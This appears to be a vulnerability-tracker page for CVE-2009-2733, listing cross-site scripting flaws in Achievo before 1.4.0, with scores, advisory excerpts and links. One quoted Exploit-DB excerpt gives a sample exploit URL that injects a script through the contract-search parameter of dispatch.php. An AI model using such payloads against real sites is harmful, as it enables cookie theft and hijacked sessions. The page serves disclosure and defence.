CVE-2009-2733
published 2009-10-16CVE-2009-2733: Multiple cross-site scripting (XSS) vulnerabilities in Achievo before 1.4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the scheduler…
PriorityP421medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.26%
80.8th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Achievo before 1.4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the scheduler title in the scheduler module, and the (2) atksearch[contractnumber], (3) atksearch_AE_customer[customer], (4) atksearchmode[contracttype], and possibly (5) atksearch[contractname] parameters to the Organization Contracts administration page, reachable through dispatch.php.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| achievo | achievo | <= 1.3.4 | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
| achievo | achievo | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Achievo 1.3.4 - Cross-Site Scripting
exploitdb·2009-10-14·CVSS 4.3
CVE-2009-2733 [MEDIUM] Achievo 1.3.4 - Cross-Site Scripting
Achievo 1.3.4 - Cross-Site Scripting
---
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/
Multiple XSS in Achievo
1. *Advisory Information*
Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733
3. *Software Description*
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, bu
Exploit-DB
Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
exploitdb·2009-10-13
CVE-2009-2733 Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
---
source: https://www.securityfocus.com/bid/36661/info
Achievo is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Versions prior to Achievo 1.4.0 are affected.
http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]=">alert('xss');&atksearchmode[contr
No writeups or analysis indexed.
http://secunia.com/advisories/37035http://securitytracker.com/id?1023017http://www.achievo.org/download/releasenotes/1_4_0http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txthttp://www.securityfocus.com/archive/1/507133/100/0/threadedhttp://www.securityfocus.com/bid/36661https://exchange.xforce.ibmcloud.com/vulnerabilities/53744https://exchange.xforce.ibmcloud.com/vulnerabilities/53745http://secunia.com/advisories/37035http://securitytracker.com/id?1023017http://www.achievo.org/download/releasenotes/1_4_0http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txthttp://www.securityfocus.com/archive/1/507133/100/0/threadedhttp://www.securityfocus.com/bid/36661https://exchange.xforce.ibmcloud.com/vulnerabilities/53744https://exchange.xforce.ibmcloud.com/vulnerabilities/53745
2009-10-16
Published